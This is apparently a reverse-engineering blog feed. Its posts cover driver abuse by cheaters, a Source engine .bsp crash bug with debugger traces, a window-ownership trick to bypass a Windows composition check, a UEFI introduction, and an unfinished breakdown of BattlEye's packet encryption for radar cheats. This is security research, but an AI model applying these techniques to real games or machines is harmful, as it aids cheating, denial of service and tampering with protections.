Normal view

There are new articles available, click to refresh the page.
Before yesterdayReverse Engineering

Why anti-cheats block overclocking tools

By: Daax
28 April 2020 at 23:00

Overview

This is a brief informational piece for the readers that don’t come from a deep technical background regarding cheats/anti-cheats/drivers or related. It’s come to our attention that many people are wondering why certain anti-cheats block or log when a player has overclocking/tuning software open. I’ll start off by explaining why these types of software require drivers, then show a few examples of why they’re dangerous and provide information about the dangerous recycling of code that makes the end-user vulnerable. Recycling code out of convenience at the risk of your end-users is a lazy decision that can result in damage to your system. In this case, the code is recycled from sites like kernelmode.info, OSR Online, and so on. The drivers that are used by this software are particularly problematic and would be the first targets I’d look for if I was looking to exploit a large population of people - gamers and tech enthusiasts would be a good crowd because of the tools presented below. This is by no means an exhaustive list, I’m only addressing a few drivers that are/have been exploited in cheating communities. There are dozens if not hundreds in the wild. Let’s cover the reasoning for a driver with these types of software.

Notice: We are not affiliated with game publishers or anti-cheat vendors, paid or otherwise.

Driver Requirements

Hardware monitoring/overclocking tools have been rising in popularity in the last half-decade with the growth in professional gaming, and technical requirements to run certain games. These tools query various system components like GPU, CPU, thermal sensors, and so on, however, this information isn’t easily acquired by a user. For example, to query the on-die digital temperature sensor to get temperature data for the CPU an application would need to perform a read on a model-specific register. These model-specific registers and the intrinsics to read/write them are only available when operating at a higher privilege level such as ring-0 (where drivers operate.) A model-specific register (MSR) is a type of register that is part of the x86 instruction set. As the name suggests, some registers are present on certain processors while others are not - making them model-specific. They’re primarily used for storing platform specific information, and CPU feature information; they can also be used in performance monitoring or thermal sensor monitoring. Intel decided to provide two instructions in the x86 ISA that allowed for privileged software (operating system or otherwise) to read or write model-specific registers. The instructions are rdmsr and wrmsr, and allow a privileged actor to modify or query the state of one of these registers. There is an extensive list of MSRs that are available for Intel and AMD processors that can be found in their respective SDM/APM. The significance of this is that much of the information in these MSRs should not be modified by any tasks privileged or not. There is rarely a need to do so even when writing device drivers.

Many drivers for hardware monitoring software allow an unprivileged task (in terms of privilege level, excluding Admin requirements) to read/write arbitrary MSRs. How does that work? Well, the drivers must have a mode of communication available so that they can read privileged data from an unprivileged application, and these drivers provide that interface. It’s important to reiterate that the majority of hardware monitoring/overclocking drivers that come packaged with the client application have much more, albeit unnecessary, functionality available through this communication protocol. The client application, let’s say the CPUZ desktop application, uses a Windows API function named DeviceIoControl. In the simplest sense, CPUZ calls DeviceIoControl with an IO control code that is known to the developers to perform a read of an MSR like the on-die digital temperature sensor. This isn’t an inherently dangerous thing. What’s problematic is that these drivers implement additional functionality that is outside the scope of the software and expose it through this same interface - like writing to MSRs, or physical memory.

So, if only the developers know the codes then why is it an issue? Reverse engineering is a fruitful endeavor. All an attacker has to do is get a copy of the driver, load it into their desired disassembler like IDA Pro, and look for the IOCTL handler. This is an IOCTL code in the CPUZ driver which is used to send 2 bytes out 2 different I/O ports - 0xB2 (broadcast SMI) and 0x84 (output port 4). This is interesting because you can force SMI using port 0xB2 which allows entry to System Management Mode. However, this doesn’t really accomplish anything significant it’s just interesting to note. The SMI port is primarily used for debugging.

Now, let’s take a look at a driver, shipped from Intel, that allows every operation an attacker could dream of.

Undisclosed Intel driver

This driver was packaged with a diagnostic tool created by Intel. It allows for many different operations, the most problematic is the ability for an unprivileged application to write directly to a memory page in physical memory.

Note: Unprivileged application meaning an application running at a low privilege level (ring-3), despite the requirement of Admin rights to carry out the DeviceIoControl request.

Among other things, it allows direct port IO (which is supposed to be a privileged operation) which can be abused to cause all sorts of issues on a target machine. From a malicious actor, it could be used to perform a denial-of-service by writing to an IO port that can be used to hard reset the processor.

As a diagnostic tool from Intel, the operations make some sense. However, this is a signed driver associated with a public tool and in the wrong hands could be abused to wreak havoc, in this case, on a game. The ability to read and write physical memory means that an attacker can access a game’s memory without having to do traditional things like open a handle to the process and use Windows APIs to assist in reading the virtual memory. It’s a bit of work for the attacker, but that’s never stopped any motivated individual. Well, I don’t use this diagnostic tool - so who cares? Take a look at the next two tools that use vulnerable drivers.

HWMonitor

I’ve seen it mentioned before around different communities for overclocking, general diagnostics, and for people that don’t have enough fans in their case to prevent them from overheating. This tool carries a driver that is also quite problematic with the functionality provided. The screenshot below shows a different method of reading a portion of physical memory via MmMapIoSpace. This would be useful for an attacker to use against a game under the guise of being a trusted hardware monitoring tool. What about writing to those model-specific registers? This tool has no business writing to any MSRs yet exposes a control case where the right code allows a user to write to any model-specific register. Here’s two images of different IOCTL blocks in HWMonitor.

As a bonus, the driver that HWMonitor uses is also the driver the CPUZ uses! If an anti-cheat were to simply block HWMonitor - the application - from running the attacker could simply pull up CPUZ and have the same capabilities. This is an issue because, as mentioned earlier, model-specific registers are meant to be read/written to by system software. Exposing these registers to the user through any sort of unchecked interface gives an attacker the ability to modify system data they should otherwise not have access to. It allows attackers to circumvent protections that may be put in place by a third-party such as an anti-cheat. An anti-cheat can register callbacks such as the ExCbSeImageVerificationDriverInfo which allows the driver to get information about a loaded driver. Utilizing a trusted driver lets the attackers go undetected. Many personally signed drivers are logged/flagged/dumped by some anti-cheats and certain ones that are WHQL or from a vendor like Intel are inherently trusted. This callback is also one method anti-cheats use to prevent drivers, like the packaged driver for CPUZ, from loading; or just noting that they are present even if the name of the driver is modified.

MSI Afterburner

At this point, it’s probably clear why many of these drivers are blocked from loading by anti-cheat software. I’ll let this exploit-db page speak for MSI Afterburner. It’s just as bad as the aforementioned drivers and to preserve the integrity of the system and game it’s reasonable for anti-cheats to prevent it from loading.

These vulnerabilities have since been patched, this is merely an example of the type of behavior in many tools. While MSI responded appropriately and updated Afterburner, not all OC/monitoring tools have been updated.

Conclusion

It should make sense now, regardless of how unfortunate, why some anti-cheats prevent the loading of these types of drivers. I’ve seen various arguments against this tactic, but in the end, the anti-cheats job is to protect the integrity of the game and maximize the quality of gameplay. If that means you can’t run your hardware monitoring tool then you’re just going to have to shut it off to play. Cheaters in games have been using these drivers since late 2015/2016, and maybe even before that (however, the first PoC wasn’t public on a large cheating forum before then). Blocking them is necessary to ensure that the anti-cheat is not being tampered with through a trusted third-party driver and that the game is protected from hackers using this method of attack. It’s understandable that being unable to use monitoring tools is frustrating, but rather than blame the anti-cheat blame the vendors of these types of software that are recycling dangerous code and putting your system at risk regardless of the game you play. If I were an attacker, I would definitely consider using one of these many drivers to compromise a system.

A solution for some of the companies would be to simply remove the unnecessary code like mapping physical memory, writing to model-specific registers, writing to control registers, and so on. Maintaining the read-only of thermal sensors and other component related data would be much less of an issue.

This is by no means an extensive article, just a brief information piece to help players/users understand why their hardware monitoring/overclocking tools are blocked by an anti-cheat.

Source Engine Memory Corruption via LUMP_PAKFILE

By: impost0r
5 May 2020 at 23:00

A month or so ago I dropped a Source engine zero-day on Twitter without much explanation of what it does. After determining that it’s unfortunately not exploitable, we’ll be exploring it, and the mess that is Valve’s Source Engine.

History

Valve’s Source Engine was released initially on June 2004, with the first game utilizing the engine being Counter-Strike: Source, which was released itself on November 1, 2004 - 15 or so years ago. Despite being touted as a “complete rewrite” Source still inherits code from GoldSrc and it’s parent, the Quake Engine. Alongside the possibility of grandfathering in bugs from GoldSrc and Quake (GoldSrc itself a victim of this), Valve’s security model for the engine is… non-existent. Valve not yet being the powerhouse they are today, but we’re left with numerous stupid fucking mistakes, dude, including designing your own memory allocator (or rather, making a wrapper around malloc.).

Of note - it’s relatively common for games to develop their own allocator, but from a security perspective it’s still not the greatest.

The Bug

The byte at offset A47B98 in the .bsp file I released and the following three bytes (\x90\x90\x90\x90), parsed as UInt32, controls how much memory is allocated as the .bsp is being loaded, namely in CS:GO (though also affecting CS:S, TF2, and L4D2). That’s the short of it.

To understand more, we’re going to have to delve deeper. Recently the source code for CS:GO circa 2017’s Operation Hydra was released - this will be our main tool.

Let’s start with WinDBG. csgo.exe loaded with the arguments -safe -novid -nosound +map exploit.bsp, we hit our first chance exception at “Host_NewGame”.

---- Host_NewGame ----
(311c.4ab0): Break instruction exception - code 80000003 (first chance)
*** WARNING: Unable to verify checksum for C:\Users\triaz\Desktop\game\bin\tier0.dll
eax=00000001 ebx=00000000 ecx=7b324750 edx=00000000 esi=90909090 edi=7b324750
eip=7b2dd35c esp=012fcd68 ebp=012fce6c iopl=0         nv up ei pl nz na po nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00000202
tier0!CStdMemAlloc::SetCRTAllocFailed+0x1c:
7b2dd35c cc              int     3

On the register $esi we can see the four responsible bytes, and if we peek at the stack pointer –

Full stack trace removed for succinctness.

              
00 012fce6c 7b2dac51 90909090 90909090 012fd0c0 tier0!CStdMemAlloc::SetCRTAllocFailed+0x1c [cstrike15_src\tier0\memstd.cpp @ 2880] 
01 (Inline) -------- -------- -------- -------- tier0!CStdMemAlloc::InternalAlloc+0x12c [cstrike15_src\tier0\memstd.cpp @ 2043] 
02 012fce84 77643546 00000000 00000000 00000000 tier0!CStdMemAlloc::Alloc+0x131 [cstrike15_src\tier0\memstd.cpp @ 2237] 
03 (Inline) -------- -------- -------- -------- filesystem_stdio!IMemAlloc::IndirectAlloc+0x8 [cstrike15_src\public\tier0\memalloc.h @ 135] 
04 (Inline) -------- -------- -------- -------- filesystem_stdio!MemAlloc_Alloc+0xd [cstrike15_src\public\tier0\memalloc.h @ 258] 
05 (Inline) -------- -------- -------- -------- filesystem_stdio!CUtlMemory<unsigned char,int>::Init+0x44 [cstrike15_src\public\tier1\utlmemory.h @ 502] 
06 012fce98 7762c6ee 00000000 90909090 00000000 filesystem_stdio!CUtlBuffer::CUtlBuffer+0x66 [cstrike15_src\tier1\utlbuffer.cpp @ 201]

Or, in a more succinct form -

0:000> dds esp
012fcd68  90909090

The bytes of $esi are directly on the stack pointer (duh). A wonderful start. Keep in mind that module - filesystem_stdio — it’ll be important later. If we continue debugging —

***** OUT OF MEMORY! attempted allocation size: 2425393296 ****
(311c.4ab0): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=00000032 ebx=03128f00 ecx=012fd0c0 edx=00000001 esi=012fd0c0 edi=00000000
eip=00000032 esp=012fce7c ebp=012fce88 iopl=0         nv up ei ng nz ac po nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00010292
00000032 ??              ???

And there we see it - the memory allocator has tried to allocate 0x90909090, as UInt32. Now while I simply used HxD to validate this, the following Python 2.7 one-liner should also function.

print int('0x90909090', 0)

(For Python 3, you’ll have to encapsulate everything from int onward in that line in another set of parentheses. RTFM.)

Which will return 2425393296, the value Source’s spaghetti code tried to allocate. (It seems, internally, Python’s int handles integers much the same way as ctypes.c_uint32 - for simplicity’s sake, we used int, but you can easily import ctypes and replicate the finding. Might want to do it with 2.7, as 3 handles some things oddly with characters, bytes, etc.)

So let’s delve a bit deeper, shall we? We would be using macOS for the next part, love it or hate it, as everyone who writes cross-platform code for the platform (and Darwin in general) seems to forget that stripping binaries is a thing - we don’t have symbols for NT, so macOS should be a viable substitute - but hey, we have the damn source code, so we can do this on Windows.

Minimization

One important thing to do before we go fully into exploitation is minimize the bug. The bug is a derivative of one found with a wrapper around zzuf, that was re-found with CERT’s BFF tool. If we look at the differences between our original map (cs_assault) and ours, we can see the differences are numerous.

Diff between files

Minimization was done manually in this case, using BSPInfo and extracting and comparing the lumps. As expected, the key error was in lump 40 - LUMP_PAKFILE. This lump is essentially a large .zip file. We can use 010 Editor’s ZIP file template to examine it.

Symbols and Source (Code)

The behavior between the Steam release and the leaked source will differ significantly.

No bug will function in a completely identical way across platforms. Assuming your goal is to weaponize this, or even get the maximum payout from Valve on H1, your main target should be Win32 - though other platforms are a viable substitute. Linux has some great tooling available and Valve regularly forgets strip is a thing on macOS (so do many other developers).

We can look at the stack trace provided by WinDBG to ascertain what’s going on.

WinDBG Stack Trace

Starting from frame 8, we’ll walk through what’s happening.

The first line of each snippet will denote where WinDBG decides the problem is.

		if ( pf->Prepare( packfile->filelen, packfile->fileofs ) )
		{
			int nIndex;
			if ( addType == PATH_ADD_TO_TAIL )
			{
				nIndex = m_SearchPaths.AddToTail();	
			}
			else
			{
				nIndex = m_SearchPaths.AddToHead();	
			}

			CSearchPath *sp = &m_SearchPaths[ nIndex ];

			sp->SetPackFile( pf );
			sp->m_storeId = g_iNextSearchPathID++;
			sp->SetPath( g_PathIDTable.AddString( newPath ) );
			sp->m_pPathIDInfo = FindOrAddPathIDInfo( g_PathIDTable.AddString( pPathID ), -1 );

			if ( IsDvdDevPathString( newPath ) )
			{
				sp->m_bIsDvdDevPath = true;
			}

			pf->SetPath( sp->GetPath() );
			pf->m_lPackFileTime = GetFileTime( newPath );

			Trace_FClose( pf->m_hPackFileHandleFS );
			pf->m_hPackFileHandleFS = NULL;

			//pf->m_PackFileID = m_FileTracker2.NotePackFileOpened( pPath, pPathID, packfile->filelen );
			m_ZipFiles.AddToTail( pf );
		}
		else
		{
			delete pf;
		}
	}
}

It’s worth noting that you’re reading this correctly - LUMP_PAKFILE is simply an embedded ZIP file. There’s nothing too much of consequence here - just pointing out m_ZipFiles does indeed refer to the familiar archival format.

Frame 7 is where we start to see what’s going on.

	zipDirBuff.EnsureCapacity( rec.centralDirectorySize );
	zipDirBuff.ActivateByteSwapping( IsX360() || IsPS3() );
	ReadFromPack( -1, zipDirBuff.Base(), -1, rec.centralDirectorySize, rec.startOfCentralDirOffset );
	zipDirBuff.SeekPut( CUtlBuffer::SEEK_HEAD, rec.centralDirectorySize );

If one is to open LUMP_PAKFILE in 010 Editor and parse the file as a ZIP file, you’ll see the following.

010 Editor viewing LUMP_PAKFILE as Zipfile

elDirectorySize is our rec.centralDirectorySize, in this case. Skipping forward a frame, we can see the following.

Commented out lines highlight lines of interest.

CUtlBuffer::CUtlBuffer( int growSize, int initSize, int nFlags ) : 
	m_Error(0)
{
	MEM_ALLOC_CREDIT();
	m_Memory.Init( growSize, initSize );
	m_Get = 0;
	m_Put = 0;
	m_nTab = 0;
	m_nOffset = 0;
	m_Flags = nFlags;
	if ( (initSize != 0) && !IsReadOnly() )
	{
		m_nMaxPut = -1;
		AddNullTermination( m_Put );
	}
	else
	{
		m_nMaxPut = 0;
	}
	...

followed by the next frame,

template< class T, class I >
void CUtlMemory<T,I>::Init( int nGrowSize /*= 0*/, int nInitSize /*= 0*/ )
{
	Purge();

	m_nGrowSize = nGrowSize;
	m_nAllocationCount = nInitSize;
	ValidateGrowSize();
	Assert( nGrowSize >= 0 );
	if (m_nAllocationCount)
	{
		UTLMEMORY_TRACK_ALLOC();
		MEM_ALLOC_CREDIT_CLASS();
		m_pMemory = (T*)malloc( m_nAllocationCount * sizeof(T) );
	}
}

and finally,

inline void *MemAlloc_Alloc( size_t nSize )
{ 
	return g_pMemAlloc->IndirectAlloc( nSize );
}

where nSize is the value we control, or $esi. Keep in mind, this is all before the actual segfault and $eip corruption. Skipping ahead to that –

***** OUT OF MEMORY! attempted allocation size: 2425393296 ****
(311c.4ab0): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=00000032 ebx=03128f00 ecx=012fd0c0 edx=00000001 esi=012fd0c0 edi=00000000
eip=00000032 esp=012fce7c ebp=012fce88 iopl=0         nv up ei ng nz ac po nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00010292
00000032 ??              ???

We’re brought to the same familiar fault. Of note is that $eax and $eip are the same value, and consistent throughout runs. If we look at the stack trace WinDBG provides, we see much of the same.

WinDBG Stack Trace

Picking apart the locals from CZipPackFile::Prepare, we can see the values on $eip and $eax repeated a few times. Namely, the tuple m_PutOverflowFunc.

m_PutOverflowFunc

So we’re able to corrupt this variable and as such, control $eax and $eip - but not to any useful extent, unfortunately. These values more or less seem arbitrary based on game version and map data. What we have, essentially - is a malloc with the value of nSize (0x90909090) with full control over the variable nSize. However, it doesn’t check if it returns a valid pointer – so the game just segfaults as we’re attempting to allocate 2 GB of memory (and returning zero.) In the end, we have a novel denial of service that does result in “control” of the instruction pointer - though not to an extent that we can pop a shell, calc, or do anything fun with it.

Thanks to mev for phrasing this better than I could.

I’d like to thank mev, another one of our members, for assisting with this writeup, alongside paracord and vmcall.

Abusing DComposition to render on external windows

By: yousif
12 May 2020 at 23:00

In 2012, Microsoft introduced “DirectComposition”, a technology that helps improve performance for bitmap drawings & compositions tremendously, the way it works is that it utilizes the graphics hardware to compose & render objects, which means that it’ll run independently, aside from the main UI thread.

It can therefore be deduced that there must be a layer of interaction, or a method to apply the composition onto the desired window, or target, abusing this layer of interaction is the main target of today’s article.

The layer of interaction that DirectCompositions use, are objects called “targets” & “visuals”, every IDCompositionTarget will be created by a respective API function that depends on a window handle, and every target will depend on a IDCompositionVisual which contains the visual content represented on the screen.

If you think that you can easily just create a window, then compose on-top of another window from a non-owning process, then you’re wrong. This will cause an error, and the composition won’t be created.

Reversal

Opening up win32kfull, which is the kernel-mode component for DWM, GDI & other windows features then searching for “DComposition” will yield multiple results:

The one we’re interested in is NtUserCreateDCompositionHwndTarget, according to it’s prototype: __int64 (HWND a1, int a2, _QWORD *a3), we can induce that this is simply just IDCompositionDevice::CreateTargetForHwnd, and the parameters are: (HWND hwnd, BOOL topmost, IDCompositionTarget** target).

At the very start of this function there’s a test that checks whether you can create a target for this composition or not:

last_status = TestWindowForCompositionTarget(window_handle, top_most);

This is a simplified form of that function:

NTSTATUS TestWindowForCompositionTarget(HWND window_handle, BOOL top_most)
{	
	tagWND* window_instance = ValidateHwnd(window_handle);
	
	if (!window_instance 
		|| !window_instance->thread_info)
		return STATUS_INVALID_PARAMETER;
		
	// some checks here to verify that DCompositions are supported, and available
	
	PEPROCESS calling_process = IoGetCurrentProcess();
	PEPROCESS owning_process = PsGetThreadProcess(window_instance->thread_info->owning_thread); // tagWnd*->tagTHREADINFO*->KTHREAD*
	
	if (calling_process != owning_process)
		return STATUS_ACCESS_DENIED;
	
	CHwndTargetProp target_properties{};
	
	if (CWindowProp::GetProp<CHwndTargetProp>(window_instance, &target_properties))
	{
		bool unk_error = false;
		
		if (top_most)
			unk_error = !(target_properties.top_most_handle == nullptr);
		else
			unk_error = !(target_properties.active_bg_handle == nullptr);
		
		if (unk_error)
			return (NTSTATUS)0x803e0006; // unique error code, i don't know what it's supposed to resemble
	}
	
	return STATUS_SUCCESS;
}

The check causing failures is if (calling_process != owning_process), this compares the caller’s process to the window’s owner process, and if this check fails they return a STATUS_ACCESS_DENIED error.

They retrieve the window’s owner process by calling ValidateHwnd, which is a function used everywhere in win32k:

This function will return a pointer to a struct of type tagWND, then access a member of type tagTHREADINFO at +0x10 (window_instance->thread_info), then access the actual thread pointer at +0x0 (thread_info->owning_thread).

One way to circumvent these checks is to swap the owning thread of the process’ window to our window temporarily, compose our target on it then swap it back very quickly, which is what the PoC is based on.

Proof Of Concept

I’ve made a PoC, that’ll hijack a window by it’s class name, then render a rectangle at it’s center. you can access the code here.

Introduction to UEFI: Part 1

26 May 2020 at 23:00

Hello, and welcome to our first article on the site! Today we will be diving into UEFI. We are aiming to provide beginners a brief first look at a few topics, including:

  1. What is UEFI?
  2. Why develop UEFI software?
  3. UEFI boot phases
  4. Getting started with developing UEFI software

What is UEFI?

Unified Extensible Firmware Interface (UEFI) is an interface that acts as the “middle-man” between the operating system and the platform firmware during the start-up process of the system. It is the successor to the BIOS and provides us with a modern alternative to the restrictive system that preceded it. The UEFI specification allows for many new features including:

  • Graphical User Interface (GUI) with mouse support
  • Support for GPT drives (including 2TB or greater drives, and more than 4 primary partitions)
  • Faster booting (depending on OS support)
  • Simplified ACPI access for power management features
  • Simplified software development compared to the arcane BIOS

As you can see, there are many compelling reasons for using UEFI over the legacy BIOS nowadays.

Why develop UEFI software?

There are many reasons as to why one would want to develop UEFI software, and today we will be mentioning a few of those reasons to hopefully inspire some of you to attempt to develop or further your knowledge in this subject.

1) Control over the boot process

One very big use case for UEFI is a boot manager such as GRUB. GRUB (GRand Unified Bootloader) is a multi-boot loader that allows a user to select the operating system they wish to boot into, whilst handling the process of selecting which OS or kernel needs to be loaded into memory. It will then transfer control to the respective OS. This is a very helpful tool, and makes use of UEFI to remove the need for manual interaction in the loading of alternative OS’s.

2) Modification of OS kernel initialization

Sometimes one may want to redirect certain OS kernel initialization procedures or even fully prevent them from running. This is not possible to do with a boot-time driver. Why is this the case? Well, a large part of kernel initialization happens before any drivers are loaded, so any modifications will not be possible after this point in the presence of Kernel Patch Protection (PatchGuard). Another reason is the issue of Driver Signature Enforcement (DSE): Microsoft requires that loaded drivers on Windows must be signed with a valid kernel mode signing certificate, unless test signing mode is enabled.

An example of a UEFI project that modifies Windows kernel initialization procedures is EfiGuard. This UEFI driver patches certain parts of the Windows boot loader and kernel at boot time, and can effectively disable PatchGuard and optionally DSE.

3) Develop low level system knowledge

Another reason for developing UEFI software could be to increase your understanding of the system at a low level. Being able to follow the initialization process of the system allows for a much more in-depth look at how operating systems themselves work. Additionally, the ability to build OS independent drivers, as well as work with a sophisticated toolset giving you full control over a system is something that may be of interest to many people.

UEFI boot phases

UEFI has six main boot phases, which are all critical in the initialization process of the platform. The combined phases are referred to as the Platform Initialization or PI. Hopefully the brief descriptions of each stage below will give you a basic understanding of this process. Our series will focus primarily on the DXE and RT phases, as these are probably the two main areas of interest for people getting started with UEFI.

Security (SEC)

This phase is the primary stage of the UEFI boot process, and will generally be used to: initialize a temporary memory store, act as the root of trust in the system and provide information to the Pre-EFI core phase. This root of trust is a mechanism that ensures any code that is executed in the PI is cryptographically validated (digitally signed), creating a “secure boot” environment.

Pre-EFI Initialization (PEI)

This is the second stage of the boot process and involves using only the CPU’s current resources to dispatch Pre-EFI Initialization Modules (PEIMs). These are used to perform initialization of specific boot-critical operations such as memory initialization, whilst also allowing control to pass to the Driver Execution Environment (DXE).

Driver Execution Environment (DXE)

The DXE phase is where the majority of the system initialization occurs. In the PEI stage, the memory required for the DXE to operate is allocated and initialized, and upon control being passed to the DXE, the DXE Dispatcher is then invoked. The dispatcher will perform the loading and execution of hardware drivers, runtime services, and any boot services required for the operating system to start.

Boot Device Selection (BDS)

Upon completion of the DXE Dispatcher executing all DXE drivers, control is passed to the BDS. This stage is responsible for initializing console devices and any remaining devices that are required. The selected boot entry is then loaded and executed in preparation for the Transient System Load (TSL).

Transient System Load (TSL)

In this phase, the PI process is now directly between the boot selection and the expected hand-off to the main operating system phase. Here, an application such as the UEFI shell may be invoked, or (more commonly) a boot loader will run in order to prepare the final OS environment. The boot loader is usually responsible for terminating the UEFI Boot Services via the ExitBootServices() call. However, it is also possible for the OS itself to do this, such as the Linux kernel with CONFIG_EFI_STUB.

Runtime (RT)

The final phase is the runtime one. Here is where the final handoff to the OS occurs. The UEFI compatible OS now takes over the system. The UEFI runtime services remain available for the OS to use, such as for querying and writing variables from NVRAM.

The SMM (System Management Mode) exists separately from the runtime phase and may also be entered during this phase when an SMI is dispatched. We will not be covering the SMM in this introduction.

Getting started with developing UEFI software

In this section we will be providing you with a list of the most essential tools to help you begin your development journey with UEFI. When it comes to the question of “where to begin?”, there aren’t many resources easily accessible, so here is a shortlist of the development tools we recommend:

- EDK2

First and foremost is the EDK2 project, which is described as “a modern, feature-rich, cross-platform firmware development environment for the UEFI and PI specifications from [www.uefi.org.]” The EDK2 project is developed and maintained (together with community volunteers) by many of the same parties that contribute to the UEFI specification.

This is extremely helpful as EDK2 is guaranteed to contain the latest UEFI protocols (assuming you are using the master branch). In addition to this, there are countless high-quality projects for you to use as a guide. One example is the Open Virtual Machine Firmware (OVMF). This is a project that is aimed at providing UEFI support for virtual machines and it is very well documented.

One major downside to EDK2 is the process of setting up the build environment for the first time - it is a long and arduous process, and even with their Getting started with EDK2 guide to make it as simple as possible, it can still be confusing for newcomers.

- VisualUefi

The VisualUefi project is aimed at allowing EDK2 development inside Visual Studio. We would recommend you to begin your development by using the build tools from EDK2 command line over this project, to allow you to become comfortable with the platform.

Furthermore, VisualUefi offers headers and libraries that are a subset of the complete EDK2 libraries, and so you may find that not everything you require is easily accessible. It is, however, much easier to set up in comparison to EDK2, and is therefore often favored by avid Visual Studio users.

- Debugging

In regards to debugging, there are a few options available to you, each with their pros and cons. These will be listed below, and it is up to you which you favor the most. In part 2 of this series we will be showing you how to debug an example driver, so until then you may want to install all of these (or none!) to help you make an informed decision:

  1. QEMU - a multiplatform emulator (though best on Linux) that provides the best debugging facilities due to being an emulator rather than a VM. It is quite complex to set up, and concerning its counterparts, it is also quite slow.
  2. VirtualBox - a good multiplatform solution, with the exception of it suffering from memory loss due to pretty lackluster non-volatile RAM (NVRAM) emulation.
  3. VMware - offers good performance with correctly working NVRAM emulation. If the guest and host are both Windows, it works very well with WinDbg for debugging the TSL and RT phases.

Final words

In this article we have covered a couple of different introductory topics to help you get a basic understanding of what UEFI is. We would expect you to hopefully have some extra questions regarding this topic, and we are more than happy to answer them for you. Part 2 of this series will be more technical, however it will be explained thoroughly to the best of our abilities to make it as simple to follow as possible. We will be providing code for a simple DXE driver built with EDK2, and will show examples of basic console input and output, writing to a serial port, and debugging the driver with QEMU.

Thank you very much for reading this far, and we look forward to continuing this series in the coming weeks!

Cracking BattlEye packet encryption

Recently, Battlestate Games, the developers of Escape From Tarkov, hired BattlEye to implement encryption on networked packets so that cheaters can’t capture these packets, parse them and use them for their advantage in the form of radar cheats, or otherwise. Today we’ll go into detail about how we broke their encryption in a few hours.

Analysis of EFT

We started first by analyzing Escape From Tarkov itself. The game uses Unity Engine, which uses C#, an intermediate langauge, which means you can very easily view the source code behind the game by opening it in tools like ILDasm or dnSpy. Our tool of choice for this analysis was dnSpy.

Unity Engine, if not under the IL2CPP option, generates game files and places them under GAME_NAME_Data\Managed, in this case it’s EscapeFromTarkov_Data\Managed. This folder contains all the dependencies that the engine uses, including the file that contains the game’s code which is Assembly-CSharp.dll, we loaded this file in dnSpy then searched for the string encryption, which landed us here:

This segment is in a class called EFT.ChannelCombined, which is the class that handles networking as you can tell by the arguments passed to it:

Right clicking on channelCombined.bool_2, which is the variable they log as an indicator for whether encryption was enabled or not, then clicking Analyze, shows us that it’s referenced by 2 methods:

The second of which is the one we’re currently in, so by double clicking on the first one, it lands on this:

Voila! There’s our call into BEClient.EncryptPacket, when you click on that method it’ll take you to the BEClient class, which we can then dissect and find a method called DecryptServerPacket, this method calls into a function in BEClient_x64.dll called pfnDecryptServerPacket that will decrypt the data into a user-allocated buffer and write the size of the decrypted buffer into a pointer supplied by the caller.

pfnDecryptServerPacket is not exported by BattlEye, nor is it calculated by EFT, it’s actually supplied by BattlEye’s initializer once called by the game. We managed to calculate the RVA (Relative Virtual Address) by loading BattlEye into a process of our own, and replicating how the game initializes it.

The code for this program is available here.

Analysis of BattlEye

As we’ve deduced from the last section, EFT calls into BattlEye to do all its cryptography needs. So now it’s a matter of reversing native code rather than IL, which is significantly harder.

BattlEye uses a protector called VMProtect, which virtualizes and mutates segments specified by the developer. To properly reverse a binary protected by this obfuscator, you’ll need to unpack it.

Unpacking is as simple as dumping the image at runtime; we did this by loading it into a local process then using Scylla to dump it’s memory to disk.

Opening this file in IDA, then going to the DecryptServerPacket routine will lead us to a function that looks like this:

This is what’s called a vmentry, which pushes a vmkey on the stack then calls into a vminit which is the handler for the virtual machine.

Here is the tricky part: the instructions in this function are only understandable by the program itself due to them being “virtualized” by VMProtect.

Luckily for us, fellow Secret Club member can1357 made a tool that completely breaks this protection, which you can find at VTIL.

Figuring the algorithm

The file produced by VTIL reduced the function from 12195 instructions down to 265, which simplified the project massively. Some VMProtect routines were present in the disassembly, but these are easily recognized and can be ignored, the encryption begins from here:

Equivalent in pseudo-C:

uint32_t flag_check = *(uint32_t*)(image_base + 0x4f8ac);

if (flag_check != 0x1b)
	goto 0x20e445;
else
	goto 0x20e52b;

VTIL uses its own instruction set, I translated this to psuedo-C to simplify it further.

We analyze this routine by going into 0x20e445, which is a jump to 0x1a0a4a, at the very start of this function they move sr12 which is a copy of rcx (the first argument on the default x64 calling convention), and store it on the stack at [rsp+0x68], and the xor key at [rsp+0x58].

This routine then jumps to 0x1196fd, which is:

Equivalent in pseudo-C:

uint32_t xor_key_1 = *(uint32_t*)(packet_data + 3) ^ xor_key;
(void(*)(uint8_t*, size_t, uint32_t))(0x3dccb7)(packet_data, packet_len, xor_key_1);

Note that rsi is rcx, and sr47 is a copy of rdx. Since this is x64, they are calling 0x3dccb7 with arguments in this order: (rcx, rdx, r8). Lucky for us vxcallq in VTIL means call into function, pause virtual exectuion then return into virtual machine, so 0x3dccb7 is not a virtualized function!

Going into that function in IDA and pressing F5 will bring up pseudo-code generated by the decompiler:

This code looks incomprehensible with some random inlined assembly that has no meaning at all. Once we nop these instructions out, change some var types, then hit F5 again the code starts to look much better:

This function decrypts the packet in 4-byte blocks non-contiguously starting from the 8th byte using a rolling XOR key.

Once we continue looking at the assembly we figure that it calls into another routine here:

Equivalent in x64 assembly:

mov t225, dword ptr [rsi+0x3]
mov t231, byte ptr [rbx]
add t231, 0xff ; uhoh, overflow

; the following is psuedo
mov [$flags], t231 u< rbx:8

not t231

movsx t230, t231
mov [$flags+6], t230 == 0
mov [$flags+7], t230 < 0

movsx t234, rbx
mov [$flags+11], t234 < 0
mov t236, t234 < 1
mov t235, [$flags+11] != t236

and [$flags+11], t235

mov rdx, sr46 ; sr46=rdx
mov r9, r8

sbb eax, eax ; this will result in the CF (carry flag) being written to EAX

mov r8, t225
mov t244, rax
and t244, 0x11 ; the value of t244 will be determined by the sbb from above, it'll be either -1 or 0 
shr r8, t244 ; if the value of this shift is a 0, that means nothing will happen to the data, otherwise it'll shift it to the right by 0x11

mov rcx, rsi
mov [rsp+0x20], r9
mov [rsp+0x28], [rsp+0x68]

call 0x3dce60

Before we continue dissecting the function it calls, we have to come to the conclusion that the shift is meaningless due to the carry flag not being set, resulting in a 0 return value from the sbb instruction, which means we’re on the wrong path.

